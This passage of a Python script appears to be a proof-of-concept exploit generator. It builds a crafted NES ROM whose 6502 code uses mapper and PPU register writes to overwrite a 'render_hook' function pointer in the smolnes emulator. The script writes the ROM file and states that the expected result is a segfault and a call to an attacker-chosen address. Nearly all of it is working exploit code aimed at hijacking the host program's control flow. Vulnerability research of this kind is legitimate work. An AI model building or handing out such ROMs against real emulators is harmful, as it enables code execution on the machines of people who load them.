V_LOW = V & 0xFF # low byte for $2006
TARGET_BYTES = TARGET_ADDR.to_bytes(8, 'little')
print(f"[*] render_hook offset from chrram: {HOOK_OFFSET} (0x{HOOK_OFFSET:04X})")
print(f"[*] Bank index: {BANK_INDEX} => mapper write val={MAPPER_VAL} to $8000")
print(f"[*] V = 0x{V:04X} => $2006 writes: 0x{V_HIGH:02X} then 0x{V_LOW:02X}")
print(f"[*] Target: 0x{TARGET_ADDR:016X}")
print(f"[*] Little-endian bytes: {TARGET_BYTES.hex()}")
# ---- 6502 code construction ----
code = bytearray()
def nop():
return bytes([0xEA])
def lda_imm(val):
return bytes([0xA9, val])
def sta_abs(addr):
return bytes([0x8D, addr & 0xFF, addr >> 8])
def jmp_abs(addr):
return bytes([0x4C, addr & 0xFF, addr >> 8])
# Step 1: Mapper 3, write to $8000 to set chr[0] = BANK_INDEX
code += lda_imm(MAPPER_VAL)
code += sta_abs(0x8000)
# Step 2: set V via two consecutive writes to $2006
code += lda_imm(V_HIGH)
code += sta_abs(0x2006)
code += lda_imm(V_LOW)
code += sta_abs(0x2006)
# Step 3: write the 8 bytes of TARGET_ADDR via $2007
# get_chr_byte(V) => &chrram[HOOK_OFFSET] = &render_hook
# V auto-increments by 1 after each access => consecutive writes
for byte in TARGET_BYTES:
code += lda_imm(byte)
code += sta_abs(0x2007)
# Infinite loop (NOP + JMP) to let the PPU advance to scany==241
nop_offset = len(code)
code += nop() # NOP
code += jmp_abs(0x8000 + nop_offset) # JMP back to NOP
print(f"[*] Code size: {len(code)} bytes (starts at $8000)")
print(f"[*] NOP loop at $8000+{nop_offset} = $" + f"{0x8000+nop_offset:04X}")
# ---- iNES ROM construction ----
PRG_SIZE = 16384 # 1 PRG bank = 16 KB
# iNES header (16 bytes)
header = bytearray(16)
header[0:4] = b'NES\x1a'
header[4] = 1 # 1 PRG bank (16 KB)
header[5] = 0 # 0 CHR banks => CHR-RAM mode
header[6] = 0x30 # Mapper 3 (high nibble = 3), horizontal mirroring
# bytes 7-15 = 0x00
# PRG ROM: filled with NOPs (0xEA), code at the start, reset vector at the end
prg = bytearray(nop() * PRG_SIZE)
# Code at offset 0 ($8000)
prg[0:len(code)] = code
# Reset vector at $FFFC-$FFFD (offset 0x3FFC in PRG): points to $8000
prg[PRG_SIZE-4] = 0x00 # low byte of $8000
prg[PRG_SIZE-3] = 0x80 # high byte of $8000
rom = bytes(header) + bytes(prg)
output_path = "poc_deadbeef.nes"
with open(output_path, "wb") as f:
f.write(rom)
print(f"\n[+] ROM written: {output_path} ({len(rom)} bytes)")
print(f"[+] Run: ./smolnes/deobfuscated {output_path}")
print(f"[+] Expected: SIGSEGV / call to 0x{TARGET_ADDR:X} after ~1 PPU frame")